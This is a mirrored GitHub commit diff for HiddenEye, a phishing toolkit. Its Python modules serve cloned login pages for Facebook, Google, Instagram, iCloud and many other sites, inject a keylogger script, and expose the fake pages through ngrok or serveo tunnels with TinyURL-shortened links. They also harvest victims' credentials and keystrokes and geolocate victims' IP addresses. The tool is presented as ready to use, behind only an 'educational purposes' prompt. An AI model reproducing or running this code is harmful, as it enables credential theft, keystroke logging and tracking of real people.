mirror of
https://github.com/DarkSecDevelopers/HiddenEye-Legacy.git
synced 2024-03-22 21:12:55 +08:00
Merge pull request #138 from DarkSecDevelopers/dev
Dev to Master, Release 0.2.0
This commit is contained in:
commit
39b00404d1
28
.gitignore
vendored
Normal file
28
.gitignore
vendored
Normal file
|
@ -0,0 +1,28 @@
|
||||||
|
|
||||||
|
*.pyc
|
||||||
|
|
||||||
|
link\.url
|
||||||
|
|
||||||
|
log\.txt
|
||||||
|
|
||||||
|
Server/ngrok
|
||||||
|
|
||||||
|
Server/www/index\.html
|
||||||
|
|
||||||
|
Server/www/ip\.php
|
||||||
|
|
||||||
|
Server/www/ip\.txt
|
||||||
|
|
||||||
|
Server/www/keylogger\.js
|
||||||
|
|
||||||
|
Server/www/keylogger\.php
|
||||||
|
|
||||||
|
Server/www/KeyloggerData\.txt
|
||||||
|
|
||||||
|
Server/www/login\.php
|
||||||
|
|
||||||
|
Server/www/mobile\.html
|
||||||
|
|
||||||
|
Server/www/usernames\.txt
|
||||||
|
|
||||||
|
Settings\.ini
|
325
Defs/Actions.py
Normal file
325
Defs/Actions.py
Normal file
|
@ -0,0 +1,325 @@
|
||||||
|
#Any actions must be here
|
||||||
|
|
||||||
|
from os import system, path
|
||||||
|
from distutils.dir_util import copy_tree
|
||||||
|
from time import sleep
|
||||||
|
import re
|
||||||
|
import json
|
||||||
|
from urllib.request import urlopen
|
||||||
|
from subprocess import check_output
|
||||||
|
from sys import stdout, argv
|
||||||
|
from Defs.Configurations import readConfig, ifSettingsNotExists
|
||||||
|
RED, WHITE, CYAN, GREEN, DEFAULT = '\033[91m', '\033[46m', '\033[36m', '\033[1;32m', '\033[0m'
|
||||||
|
|
||||||
|
ifSettingsNotExists()
|
||||||
|
config = readConfig()
|
||||||
|
logFile = None
|
||||||
|
didBackground = config.get("Settings","DidBackground")
|
||||||
|
for arg in argv:
|
||||||
|
if arg=="--nolog": #If true - don't log
|
||||||
|
didBackground = False
|
||||||
|
if config.get("Settings", "DidBackground") == "True":
|
||||||
|
logFile = open("log.txt", "w")
|
||||||
|
|
||||||
|
def runPhishing(page , customOption): #Phishing pages selection menu
|
||||||
|
system('rm -Rf Server/www/*.* && touch Server/www/usernames.txt && touch Server/www/ip.txt && cp WebPages/ip.php Server/www/ && cp WebPages/KeyloggerData.txt Server/www/ && cp WebPages/keylogger.js Server/www/ && cp WebPages/keylogger.php Server/www/')
|
||||||
|
if customOption == '1' and page == 'Facebook':
|
||||||
|
copy_tree("WebPages/fb_standard/", "Server/www/")
|
||||||
|
if customOption == '2' and page == 'Facebook':
|
||||||
|
copy_tree("WebPages/fb_advanced_poll/", "Server/www/")
|
||||||
|
if customOption == '3' and page == 'Facebook':
|
||||||
|
copy_tree("WebPages/fb_security_fake/", "Server/www/")
|
||||||
|
if customOption == '4' and page == 'Facebook':
|
||||||
|
copy_tree("WebPages/fb_messenger/", "Server/www/")
|
||||||
|
elif customOption == '1' and page == 'Google':
|
||||||
|
copy_tree("WebPages/google_standard/", "Server/www/")
|
||||||
|
elif customOption == '2' and page == 'Google':
|
||||||
|
copy_tree("WebPages/google_advanced_poll/", "Server/www/")
|
||||||
|
elif customOption == '3' and page == 'Google':
|
||||||
|
copy_tree("WebPages/google_advanced_web/", "Server/www/")
|
||||||
|
elif page == 'LinkedIn':
|
||||||
|
copy_tree("WebPages/linkedin/", "Server/www/")
|
||||||
|
elif page == 'GitHub':
|
||||||
|
copy_tree("WebPages/GitHub/", "Server/www/")
|
||||||
|
elif page == 'StackOverflow':
|
||||||
|
copy_tree("WebPages/stackoverflow/", "Server/www/")
|
||||||
|
elif page == 'WordPress':
|
||||||
|
copy_tree("WebPages/wordpress/", "Server/www/")
|
||||||
|
elif page == 'Twitter':
|
||||||
|
copy_tree("WebPages/twitter/", "Server/www/")
|
||||||
|
elif page == 'Snapchat':
|
||||||
|
copy_tree("WebPages/Snapchat_web/", "Server/www/")
|
||||||
|
elif page == 'Yahoo':
|
||||||
|
copy_tree("WebPages/yahoo_web/", "Server/www/")
|
||||||
|
elif page == 'Twitch':
|
||||||
|
copy_tree("WebPages/twitch/", "Server/www/")
|
||||||
|
elif page == 'Microsoft':
|
||||||
|
copy_tree("WebPages/live_web/", "Server/www/")
|
||||||
|
elif page == 'Steam':
|
||||||
|
copy_tree("WebPages/steam/", "Server/www/")
|
||||||
|
elif page == 'iCloud':
|
||||||
|
copy_tree("WebPages/iCloud/", "Server/www/")
|
||||||
|
elif customOption == '1' and page == 'Instagram':
|
||||||
|
copy_tree("WebPages/Instagram_web/", "Server/www/")
|
||||||
|
elif customOption == '2' and page == 'Instagram':
|
||||||
|
copy_tree("WebPages/Instagram_autoliker/", "Server/www/")
|
||||||
|
elif customOption == '1' and page == 'VK':
|
||||||
|
copy_tree("WebPages/VK/", "Server/www/")
|
||||||
|
elif customOption == '2' and page == 'VK':
|
||||||
|
copy_tree("WebPages/VK_poll_method/", "Server/www/")
|
||||||
|
|
||||||
|
def selectServer(): #Question where user must select server
|
||||||
|
print("\n {0}Please select any available server:{1}".format(RED, DEFAULT))
|
||||||
|
print("\n {0}[{1}1{0}]{1} Ngrok\n {0}[{1}2{0}]{1} Serveo".format(RED, DEFAULT))
|
||||||
|
|
||||||
|
choice = input(" \n {0}HiddenEye >>> {1}".format(RED, DEFAULT))
|
||||||
|
|
||||||
|
if choice == '1':
|
||||||
|
runNgrok()
|
||||||
|
elif choice == '2':
|
||||||
|
runServeo()
|
||||||
|
else:
|
||||||
|
system('clear')
|
||||||
|
return selectServer()
|
||||||
|
def runNgrok():
|
||||||
|
system('./Server/ngrok http 1111 > /dev/null &')
|
||||||
|
while True:
|
||||||
|
sleep(2)
|
||||||
|
system('curl -s -N http://127.0.0.1:4040/status | grep "https://[0-9a-z]*\.ngrok.io" -oh > ngrok.url')
|
||||||
|
urlFile = open('ngrok.url', 'r')
|
||||||
|
url = urlFile.read()
|
||||||
|
urlFile.close()
|
||||||
|
if re.match("https://[0-9a-z]*\.ngrok.io", url) != None:
|
||||||
|
print("\n {0}[{1}*{0}]{1} Ngrok URL: {2}".format(RED, DEFAULT, GREEN) + url + "{1}".format(RED, DEFAULT, GREEN))
|
||||||
|
link = check_output("curl -s 'http://tinyurl.com/api-create.php?url='"+url, shell=True).decode().replace('http', 'https')
|
||||||
|
print("\n {0}[{1}*{0}]{1} TINYURL: {2}".format(RED, DEFAULT, GREEN) + link + "{1}".format(RED, DEFAULT, GREEN))
|
||||||
|
print("\n")
|
||||||
|
break
|
||||||
|
|
||||||
|
def runServeo():
|
||||||
|
system('ssh -o StrictHostKeyChecking=no -o ServerAliveInterval=60 -R 80:localhost:1111 serveo.net > link.url 2> /dev/null &')
|
||||||
|
sleep(7)
|
||||||
|
with open('link.url') as creds:
|
||||||
|
lines = creds.read().rstrip()
|
||||||
|
if len(lines) != 0:
|
||||||
|
pass
|
||||||
|
else:
|
||||||
|
runServeo()
|
||||||
|
output = check_output("grep -o 'https://[0-9a-z]*\.serveo.net' link.url", shell=True)
|
||||||
|
url = str(output).strip("b ' \ n")
|
||||||
|
print("\n {0}[{1}*{0}]{1} SERVEO URL: {2}".format(RED, DEFAULT, GREEN) + url + "{1}".format(RED, DEFAULT, GREEN))
|
||||||
|
link = check_output("curl -s 'http://tinyurl.com/api-create.php?url='"+url, shell=True).decode().replace('http', 'https')
|
||||||
|
print("\n {0}[{1}*{0}]{1} TINYURL: {2}".format(RED, DEFAULT, GREEN) + link + "{1}".format(RED, DEFAULT, GREEN))
|
||||||
|
print("\n")
|
||||||
|
|
||||||
|
def runMainMenu(): #menu where user select what they wanna use
|
||||||
|
system('clear')
|
||||||
|
print ('''
|
||||||
|
|
||||||
|
|
||||||
|
{1}<=============================================================================>
|
||||||
|
|| ||
|
||||||
|
{1}|| ██ ██ ██ ██████ ██████ ███████ ███ ██ {3}███████ ██ ██ ███████ {1}||
|
||||||
|
{1}|| ██ ██ ██ ██ ██ ██ ██ ██ ████ ██ {3}██ ██ ██ ██ {1}||
|
||||||
|
{1}|| ███████ ██ ██ ██ ██ ██ ███████ ██ ██ ██ {3}███████ ████ ███████ {1}||
|
||||||
|
{1}|| ██ ██ ██ ██ ██ ██ ██ ██ ██ ████ {3}██ ██ ██ {1}||
|
||||||
|
{1}|| ██ ██ ██ ██████ ██████ ███████ ██ ███ {3}███████ ██ ███████ {1}||
|
||||||
|
|| ||
|
||||||
|
-----------------------------------------------------------------------------
|
||||||
|
v{3}0{1}.{3}1{1}.{3}0{1} BY:DARKSEC{2}
|
||||||
|
{0}[ NOW WITH LIVE VICTIM ATTACK INFORMATION ]
|
||||||
|
{0}A KEYLOGGER WILL BE DEPLOYED FOR YOU, TO CAPTURE EVERY KEYSTROKE ]
|
||||||
|
<=============================================================================>
|
||||||
|
'''.format(GREEN, DEFAULT, CYAN, RED))
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
if 256 != system('which php'): #Checking if user have PHP
|
||||||
|
print (" -----------------------".format(CYAN, DEFAULT))
|
||||||
|
print ("[PHP INSTALLATION FOUND]".format(CYAN, DEFAULT))
|
||||||
|
print (" -----------------------".format(CYAN, DEFAULT))
|
||||||
|
else:
|
||||||
|
print (" --{0}>{1} PHP NOT FOUND: \n {0}*{1} Please install PHP and run me again.http://www.php.net/".format(CYAN, DEFAULT))
|
||||||
|
exit(0)
|
||||||
|
|
||||||
|
for i in range(101):
|
||||||
|
sleep(0.05)
|
||||||
|
stdout.write("\r{0}[{1}*{0}]{1} HiddenEye is Opening. Please Wait... %d%%".format(RED, DEFAULT) % i)
|
||||||
|
stdout.flush()
|
||||||
|
|
||||||
|
if input("\n{2}[{1}!{2}]{1} Do you agree to use this tool for educational purposes only? ({2}y{1}/{0}n{1})\n{2}HiddenEye >>> {1}".format(CYAN, DEFAULT, RED)).upper() != 'Y': #Question where user must accept education purposes
|
||||||
|
system('clear')
|
||||||
|
print ('\n\n[ {0}YOU ARE NOT AUTHORIZED TO USE THIS TOOL.YOU CAN ONLY USE IT FOR EDUCATIONAL PURPOSE. GOOD BYE!{1} ]\n\n'.format(RED, DEFAULT))
|
||||||
|
exit(0)
|
||||||
|
option = input("\nSELECT ANY ATTACK VECTOR FOR YOUR VICTIM:\n\n {0}[{1}1{0}]{1} Facebook\n\n {0}[{1}2{0}]{1} Google\n\n {0}[{1}3{0}]{1} LinkedIn\n\n {0}[{1}4{0}]{1} GitHub\n\n {0}[{1}5{0}]{1} StackOverflow\n\n {0}[{1}6{0}]{1} WordPress\n\n {0}[{1}7{0}]{1} Twitter\n\n {0}[{1}8{0}]{1} Instagram\n\n {0}[{1}9{0}]{1} Snapchat\n\n {0}[{1}10{0}]{1} Yahoo\n\n {0}[{1}11{0}]{1} Twitch\n\n {0}[{1}12{0}]{1} Microsoft\n\n {0}[{1}13{0}]{1} Steam\n\n {0}[{1}14{0}]{1} VK\n\n {0}[{1}15{0}]{1} iCloud\n\n{0}HiddenEye >>> {1}".format(RED, DEFAULT))
|
||||||
|
if option == '1':
|
||||||
|
loadModule('Facebook')
|
||||||
|
customOption = input("\nOperation mode:\n\n {0}[{1}1{0}]{1} Standard Page Phishing\n\n {0}[{1}2{0}]{1} Advanced Phishing-Poll Ranking Method(Poll_mode/login_with)\n\n {0}[{1}3{0}]{1} Facebook Phishing- Fake Security issue(security_mode) \n\n {0}[{1}4{0}]{1} Facebook Phising-Messenger Credentials(messenger_mode) \n\n{0}HiddenEye >>> {1}".format(RED, DEFAULT))
|
||||||
|
runPhishing('Facebook', customOption)
|
||||||
|
elif option == '2':
|
||||||
|
loadModule('Google')
|
||||||
|
customOption = input("\nOperation mode:\n\n {0}[{1}1{0}]{1} Standard Page Phishing\n\n {0}[{1}2{0}]{1} Advanced Phishing(poll_mode/login_with)\n\n {0}[{1}3{0}]{1} New Google Web\n\n{0}HiddenEye >>> {1}".format(RED, DEFAULT))
|
||||||
|
runPhishing('Google', customOption)
|
||||||
|
elif option == '3':
|
||||||
|
loadModule('LinkedIn')
|
||||||
|
customOption = ''
|
||||||
|
runPhishing('LinkedIn', customOption)
|
||||||
|
elif option == '4':
|
||||||
|
loadModule('GitHub')
|
||||||
|
customOption = ''
|
||||||
|
runPhishing('GitHub', customOption)
|
||||||
|
elif option == '5':
|
||||||
|
loadModule('StackOverflow')
|
||||||
|
customOption = ''
|
||||||
|
runPhishing('StackOverflow', customOption)
|
||||||
|
elif option == '6':
|
||||||
|
loadModule('WordPress')
|
||||||
|
customOption = ''
|
||||||
|
runPhishing('WordPress', customOption)
|
||||||
|
elif option == '7':
|
||||||
|
loadModule('Twitter')
|
||||||
|
customOption = ''
|
||||||
|
runPhishing('Twitter', customOption)
|
||||||
|
elif option == '8':
|
||||||
|
loadModule('Instagram')
|
||||||
|
customOption = input("\nOperation mode:\n\n {0}[{1}1{0}]{1} Standard Instagram Web Page Phishing\n\n {0}[{1}2{0}]{1} Instagram Autoliker Phising (After submit redirects to original autoliker)\n\n{0}HiddenEye >>> {1}".format(RED, DEFAULT))
|
||||||
|
runPhishing('Instagram', customOption)
|
||||||
|
elif option == '9':
|
||||||
|
loadModule('Snapchat')
|
||||||
|
customOption = ''
|
||||||
|
runPhishing('Snapchat', customOption)
|
||||||
|
elif option == '10':
|
||||||
|
loadModule('Yahoo')
|
||||||
|
customOption = ''
|
||||||
|
runPhishing('Yahoo', customOption)
|
||||||
|
elif option == '11':
|
||||||
|
loadModule('Twitch')
|
||||||
|
customOption = ''
|
||||||
|
runPhishing('Twitch', customOption)
|
||||||
|
elif option == '12':
|
||||||
|
loadModule('Microsoft')
|
||||||
|
customOption = ''
|
||||||
|
runPhishing('Microsoft', customOption)
|
||||||
|
elif option == '13':
|
||||||
|
loadModule('Steam')
|
||||||
|
customOption = ''
|
||||||
|
runPhishing('Steam', customOption)
|
||||||
|
elif option == '14':
|
||||||
|
loadModule('VK')
|
||||||
|
customOption = input("\nOperation mode:\n\n {0}[{1}1{0}]{1} Standard VK Web Page Phishing\n\n {0}[{1}2{0}]{1} Advanced Phishing(poll_mode/login_with)\n\n{0}HiddenEye >>> {1}".format(RED, DEFAULT))
|
||||||
|
runPhishing('VK', customOption)
|
||||||
|
elif option == '15':
|
||||||
|
loadModule('iCloud')
|
||||||
|
customOption = ''
|
||||||
|
runPhishing('iCloud', customOption)
|
||||||
|
else:
|
||||||
|
exit(0)
|
||||||
|
|
||||||
|
def loadModule(module): #This one just show text..
|
||||||
|
print (''' {0}
|
||||||
|
[{1}*{0}] module loaded. Building site...{0}'''.format(RED, DEFAULT))
|
||||||
|
|
||||||
|
def inputCustom(): #Question where user can input custom web-link
|
||||||
|
print("\n (Choose Wisely As Your Victim Will Redirect to This Link)".format(RED, DEFAULT))
|
||||||
|
print("\n (Leave Blank To Loop The Phishing Page)".format(RED, DEFAULT))
|
||||||
|
print("\n {0}Insert a custom redirect url:".format(RED, DEFAULT))
|
||||||
|
custom = input("\n {0}CUSTOM URL>>> {1}".format(RED, DEFAULT))
|
||||||
|
if 'http://' in custom or 'https://' in custom:
|
||||||
|
pass
|
||||||
|
else:
|
||||||
|
custom = 'http://' + custom
|
||||||
|
if path.exists('Server/www/post.php') and path.exists('Server/www/login.php'):
|
||||||
|
with open('Server/www/login.php') as f:
|
||||||
|
read_data = f.read()
|
||||||
|
c = read_data.replace('<CUSTOM>', custom)
|
||||||
|
f = open('Server/www/login.php', 'w')
|
||||||
|
f.write(c)
|
||||||
|
f.close()
|
||||||
|
with open('Server/www/post.php') as f:
|
||||||
|
read_data = f.read()
|
||||||
|
c = read_data.replace('<CUSTOM>', custom)
|
||||||
|
f = open('Server/www/post.php', 'w')
|
||||||
|
f.write(c)
|
||||||
|
f.close()
|
||||||
|
else:
|
||||||
|
with open('Server/www/login.php') as f:
|
||||||
|
read_data = f.read()
|
||||||
|
c = read_data.replace('<CUSTOM>', custom)
|
||||||
|
f = open('Server/www/login.php', 'w')
|
||||||
|
f.write(c)
|
||||||
|
f.close()
|
||||||
|
|
||||||
|
def runServer():
|
||||||
|
system("cd Server/www/ && php -S 127.0.0.1:1111 > /dev/null 2>&1 &")
|
||||||
|
|
||||||
|
def endMessage(): #Message when HiddenEye exit
|
||||||
|
system('clear')
|
||||||
|
print ('''
|
||||||
|
{1}_....~~~~=====~~~~...._
|
||||||
|
.'========={3}/----=\{1}=========>
|
||||||
|
/:========={3}/-----====\{1}
|
||||||
|
|=========={3}|-----======|{1}==========>
|
||||||
|
\:========={3}\---======/{1}
|
||||||
|
\=========={3}\=====/{1}==========>
|
||||||
|
````~~~~=======~~~~````
|
||||||
|
|
||||||
|
{3}HIDDEN EYE {3}BY: DARKSEC TEAM
|
||||||
|
{0}THANKS FOR USING IT. HELP US TO MAKE IT MORE USEFUL
|
||||||
|
{3}https://github.com/DarkSecDevelopers '''.format(GREEN, DEFAULT, CYAN, RED))
|
||||||
|
|
||||||
|
def getCredentials():
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
print("{0}[{1}*{0}]{1} Waiting for credentials//Keystrokes//Victim's device info. \n".format(CYAN, DEFAULT))
|
||||||
|
while True:
|
||||||
|
with open('Server/www/usernames.txt') as creds:
|
||||||
|
lines = creds.read().rstrip()
|
||||||
|
if len(lines) != 0:
|
||||||
|
writeLog('======================================================================'.format(RED, DEFAULT))
|
||||||
|
writeLog(' {0}[ CREDENTIALS FOUND ]{1}:\n {0}%s{1}'.format(GREEN, DEFAULT) % lines)
|
||||||
|
system('rm -rf Server/www/usernames.txt && touch Server/www/usernames.txt')
|
||||||
|
writeLog('======================================================================'.format(RED, DEFAULT))
|
||||||
|
|
||||||
|
creds.close()
|
||||||
|
|
||||||
|
|
||||||
|
with open('Server/www/ip.txt') as creds:
|
||||||
|
lines = creds.read().rstrip()
|
||||||
|
if len(lines) != 0:
|
||||||
|
ip = re.match('Victim Public IP: (.*?)\n', lines).group(1)
|
||||||
|
resp = urlopen('https://ipinfo.io/%s/json' % ip)
|
||||||
|
ipinfo = json.loads(resp.read().decode(resp.info().get_param('charset') or 'utf-8'))
|
||||||
|
if 'bogon' in ipinfo:
|
||||||
|
log('======================================================================'.format(RED, DEFAULT))
|
||||||
|
log(' \n{0}[ VICTIM IP BONUS ]{1}:\n {0}%s{1}'.format(GREEN, DEFAULT) % lines)
|
||||||
|
else:
|
||||||
|
matchObj = re.match('^(.*?),(.*)$', ipinfo['loc'])
|
||||||
|
latitude = matchObj.group(1)
|
||||||
|
longitude = matchObj.group(2)
|
||||||
|
writeLog('======================================================================'.format(RED, DEFAULT))
|
||||||
|
writeLog(' \n{0}[ VICTIM INFO FOUND ]{1}:\n {0}%s{1}'.format(GREEN, DEFAULT) % lines)
|
||||||
|
writeLog(' \n{0}Longitude: %s \nLatitude: %s{1}'.format(GREEN, DEFAULT) % (longitude, latitude))
|
||||||
|
writeLog(' \n{0}ISP: %s \nCountry: %s{1}'.format(GREEN, DEFAULT) % (ipinfo['org'], ipinfo['country']))
|
||||||
|
writeLog(' \n{0}Region: %s \nCity: %s{1}'.format(GREEN, DEFAULT) % (ipinfo['region'], ipinfo['city']))
|
||||||
|
system('rm -rf Server/www/ip.txt && touch Server/www/ip.txt')
|
||||||
|
writeLog('======================================================================'.format(RED, DEFAULT))
|
||||||
|
|
||||||
|
creds.close()
|
||||||
|
|
||||||
|
with open('Server/www/KeyloggerData.txt') as creds:
|
||||||
|
lines = creds.read().rstrip()
|
||||||
|
if len(lines) != 0:
|
||||||
|
writeLog('______________________________________________________________________'.format(RED, DEFAULT))
|
||||||
|
writeLog(' {0}[ GETTING PRESSED KEYS ]{1}:\n {0}%s{1}'.format(GREEN, DEFAULT) % lines)
|
||||||
|
system('rm -rf Server/www/KeyloggerData.txt && touch Server/www/KeyloggerData.txt')
|
||||||
|
writeLog('______________________________________________________________________'.format(RED, DEFAULT))
|
||||||
|
|
||||||
|
|
||||||
|
creds.close()
|
||||||
|
|
||||||
|
def writeLog(ctx): #Writing log
|
||||||
|
if config.get("Settings", "DidBackground") == "True": #if didBackground == True, write
|
||||||
|
logFile.write(ctx.replace(RED, "").replace(WHITE, "").replace(CYAN, "").replace(GREEN, "").replace(DEFAULT, "") + "\n")
|
||||||
|
print(ctx)
|
45
Defs/Checks.py
Normal file
45
Defs/Checks.py
Normal file
|
@ -0,0 +1,45 @@
|
||||||
|
#Checks functions
|
||||||
|
|
||||||
|
from urllib.request import urlopen
|
||||||
|
from os import path, system
|
||||||
|
from subprocess import check_output
|
||||||
|
from platform import system as systemos, architecture
|
||||||
|
from wget import download
|
||||||
|
|
||||||
|
RED, GREEN, DEFAULT = '\033[91m', '\033[1;32m', '\033[0m'
|
||||||
|
|
||||||
|
def checkConnection(host='http://duckduckgo.com'): #Connection check
|
||||||
|
try:
|
||||||
|
urlopen(host)
|
||||||
|
print("{0}Successful connection!{1}".format(GREEN, DEFAULT))
|
||||||
|
return True
|
||||||
|
except:
|
||||||
|
return False
|
||||||
|
|
||||||
|
if checkConnection() == False:
|
||||||
|
print ('''{1}
|
||||||
|
_ _ . ___ ___ ___ _ _ {0}___ _ _ ___{1}
|
||||||
|
|__| | ] | ] | |__ |\ | {0}|__ \__/ |__{1}
|
||||||
|
| | | ]__| ]__| |__ | \| {0}|__ || |__{1}
|
||||||
|
|
||||||
|
{0}[{1}!{0}]{1} Network error. Verify your connection.\n
|
||||||
|
'''.format(RED, DEFAULT))
|
||||||
|
exit(0)
|
||||||
|
|
||||||
|
def checkNgrok(): #Ngrok check
|
||||||
|
if path.isfile('Server/ngrok') == False: #Is Ngrok downloaded?
|
||||||
|
print('[*] Downloading Ngrok...')
|
||||||
|
if 'Android' in str(check_output(('uname', '-a'))):
|
||||||
|
filename = 'ngrok-stable-linux-arm.zip'
|
||||||
|
else:
|
||||||
|
ostype = systemos().lower()
|
||||||
|
if architecture()[0] == '64bit':
|
||||||
|
filename = 'ngrok-stable-{0}-amd64.zip'.format(ostype)
|
||||||
|
else:
|
||||||
|
filename = 'ngrok-stable-{0}-386.zip'.format(ostype)
|
||||||
|
url = 'https://bin.equinox.io/c/4VmDzA7iaHb/' + filename
|
||||||
|
download(url)
|
||||||
|
system('unzip ' + filename)
|
||||||
|
system('mv ngrok Server/ngrok')
|
||||||
|
system('rm -Rf ' + filename)
|
||||||
|
system('clear')
|
23
Defs/Configurations.py
Normal file
23
Defs/Configurations.py
Normal file
|
@ -0,0 +1,23 @@
|
||||||
|
#Primitive config
|
||||||
|
import configparser
|
||||||
|
import os
|
||||||
|
|
||||||
|
def createConfig(path = "Settings.ini"):
|
||||||
|
config = configparser.ConfigParser()
|
||||||
|
config.add_section("Settings")
|
||||||
|
config.add_section("Defaults")
|
||||||
|
config.set("Settings", "Language", "en")
|
||||||
|
config.set("Settings", "DidBackground", "True")
|
||||||
|
config.set("Defaults", "webPage", "Facebook")
|
||||||
|
config.set("Defaults", "additionalOption", "1")
|
||||||
|
with open(path, 'w') as configFile:
|
||||||
|
config.write(configFile)
|
||||||
|
|
||||||
|
def readConfig(path = "Settings.ini"):
|
||||||
|
config = configparser.ConfigParser()
|
||||||
|
config.read(path)
|
||||||
|
return config
|
||||||
|
|
||||||
|
def ifSettingsNotExists():
|
||||||
|
if not os.path.exists("Settings.ini"):
|
||||||
|
createConfig()
|
1
Defs/Languages.py
Normal file
1
Defs/Languages.py
Normal file
|
@ -0,0 +1 @@
|
||||||
|
#WILL BE SOON!!!
|
0
Defs/__init__.py
Normal file
0
Defs/__init__.py
Normal file
355
HiddenEye.py
355
HiddenEye.py
|
@ -1,9 +1,5 @@
|
||||||
#!/usr/bin/python3
|
#HiddenEye by Open Source Community
|
||||||
#-*- coding: utf-8 -*-
|
import os
|
||||||
# HiddenEye v1.0
|
|
||||||
# By:- DARKSEC TEAM
|
|
||||||
#
|
|
||||||
###########################
|
|
||||||
from time import sleep
|
from time import sleep
|
||||||
from sys import stdout, exit, argv
|
from sys import stdout, exit, argv
|
||||||
from os import system, path
|
from os import system, path
|
||||||
|
@ -15,348 +11,33 @@ from wget import download
|
||||||
import re
|
import re
|
||||||
import json
|
import json
|
||||||
from subprocess import check_output
|
from subprocess import check_output
|
||||||
|
from Defs.Checks import checkConnection, checkNgrok
|
||||||
|
from Defs.Configurations import createConfig, readConfig, ifSettingsNotExists
|
||||||
|
from Defs.Actions import runPhishing, selectServer, runNgrok, runServeo, runMainMenu, inputCustom, runServer, endMessage, getCredentials, writeLog
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
RED, WHITE, CYAN, GREEN, DEFAULT = '\033[91m', '\033[46m', '\033[36m', '\033[1;32m', '\033[0m'
|
RED, WHITE, CYAN, GREEN, DEFAULT = '\033[91m', '\033[46m', '\033[36m', '\033[1;32m', '\033[0m'
|
||||||
|
|
||||||
def connected(host='http://duckduckgo.com'): #Checking network connection.
|
checkConnection()
|
||||||
try:
|
|
||||||
urlopen(host)
|
|
||||||
return True
|
|
||||||
except:
|
|
||||||
return False
|
|
||||||
if connected() == False: #If there no network
|
|
||||||
print ('''{0}[{1}!{0}]{1} Network error. Verify your Internet connection.\n
|
|
||||||
'''.format(RED, DEFAULT))
|
|
||||||
exit(0)
|
|
||||||
|
|
||||||
def checkNgrok(): #Check if user already have Ngrok server, if False - downloading it.
|
|
||||||
if path.isfile('Server/ngrok') == False:
|
|
||||||
print('[*] Downloading Ngrok...')
|
|
||||||
if 'Android' in str(check_output(('uname', '-a'))):
|
|
||||||
filename = 'ngrok-stable-linux-arm.zip'
|
|
||||||
else:
|
|
||||||
ostype = systemos().lower()
|
|
||||||
if architecture()[0] == '64bit':
|
|
||||||
filename = 'ngrok-stable-{0}-amd64.zip'.format(ostype)
|
|
||||||
else:
|
|
||||||
filename = 'ngrok-stable-{0}-386.zip'.format(ostype)
|
|
||||||
url = 'https://bin.equinox.io/c/4VmDzA7iaHb/' + filename
|
|
||||||
download(url)
|
|
||||||
system('unzip ' + filename)
|
|
||||||
system('mv ngrok Server/ngrok')
|
|
||||||
system('rm -Rf ' + filename)
|
|
||||||
system('clear')
|
|
||||||
checkNgrok()
|
checkNgrok()
|
||||||
|
|
||||||
def end(): #Message when HiddenEye exit
|
ifSettingsNotExists()
|
||||||
system('clear')
|
readConfig()
|
||||||
print ('''{1}THANK YOU FOR USING ! JOIN DARKSEC TEAM NOW (github.com/DarkSecDevelopers).{1}'''.format(RED, DEFAULT, CYAN))
|
config = readConfig()
|
||||||
print ('''{1}WAITING FOR YOUR CONTRIBUTION. GOOD BYE !.{1}'''.format(RED, DEFAULT, CYAN))
|
|
||||||
|
|
||||||
def loadModule(module):
|
|
||||||
print ('''{0}[{1}*{0}]{1} You Have Selected %s Module ! KEEP GOING !{0}'''.format(CYAN, DEFAULT) % module)
|
|
||||||
|
|
||||||
def runPhishing(page, option2): #Phishing pages selection menu
|
|
||||||
system('rm -Rf Server/www/*.* && touch Server/www/usernames.txt && touch Server/www/ip.txt && cp WebPages/ip.php Server/www/ && cp WebPages/KeyloggerData.txt Server/www/ && cp WebPages/keylogger.js Server/www/ && cp WebPages/keylogger.php Server/www/')
|
|
||||||
if option2 == '1' and page == 'Facebook':
|
|
||||||
copy_tree("WebPages/fb_standard/", "Server/www/")
|
|
||||||
if option2 == '2' and page == 'Facebook':
|
|
||||||
copy_tree("WebPages/fb_advanced_poll/", "Server/www/")
|
|
||||||
if option2 == '3' and page == 'Facebook':
|
|
||||||
copy_tree("WebPages/fb_security_fake/", "Server/www/")
|
|
||||||
if option2 == '4' and page == 'Facebook':
|
|
||||||
copy_tree("WebPages/fb_messenger/", "Server/www/")
|
|
||||||
elif option2 == '1' and page == 'Google':
|
|
||||||
copy_tree("WebPages/google_standard/", "Server/www/")
|
|
||||||
elif option2 == '2' and page == 'Google':
|
|
||||||
copy_tree("WebPages/google_advanced_poll/", "Server/www/")
|
|
||||||
elif option2 == '3' and page == 'Google':
|
|
||||||
copy_tree("WebPages/google_advanced_web/", "Server/www/")
|
|
||||||
elif page == 'LinkedIn':
|
|
||||||
copy_tree("WebPages/linkedin/", "Server/www/")
|
|
||||||
elif page == 'GitHub':
|
|
||||||
copy_tree("WebPages/GitHub/", "Server/www/")
|
|
||||||
elif page == 'StackOverflow':
|
|
||||||
copy_tree("WebPages/stackoverflow/", "Server/www/")
|
|
||||||
elif page == 'WordPress':
|
|
||||||
copy_tree("WebPages/wordpress/", "Server/www/")
|
|
||||||
elif page == 'Twitter':
|
|
||||||
copy_tree("WebPages/twitter/", "Server/www/")
|
|
||||||
elif page == 'Snapchat':
|
|
||||||
copy_tree("WebPages/Snapchat_web/", "Server/www/")
|
|
||||||
elif page == 'Yahoo':
|
|
||||||
copy_tree("WebPages/yahoo_web/", "Server/www/")
|
|
||||||
elif page == 'Twitch':
|
|
||||||
copy_tree("WebPages/twitch/", "Server/www/")
|
|
||||||
elif page == 'Microsoft':
|
|
||||||
copy_tree("WebPages/live_web/", "Server/www/")
|
|
||||||
elif page == 'Steam':
|
|
||||||
copy_tree("WebPages/steam/", "Server/www/")
|
|
||||||
elif page == 'iCloud':
|
|
||||||
copy_tree("WebPages/iCloud/", "Server/www/")
|
|
||||||
elif option2 == '1' and page == 'Instagram':
|
|
||||||
copy_tree("WebPages/Instagram_web/", "Server/www/")
|
|
||||||
elif option2 == '2' and page == 'Instagram':
|
|
||||||
copy_tree("WebPages/Instagram_autoliker/", "Server/www/")
|
|
||||||
elif option2 == '1' and page == 'VK':
|
|
||||||
copy_tree("WebPages/VK/", "Server/www/")
|
|
||||||
elif option2 == '2' and page == 'VK':
|
|
||||||
copy_tree("WebPages/VK_poll_method/", "Server/www/")
|
|
||||||
|
|
||||||
|
|
||||||
didBackground = True
|
|
||||||
logFile = None
|
|
||||||
for arg in argv:
|
|
||||||
if arg=="--nolog": #If true - don't log
|
|
||||||
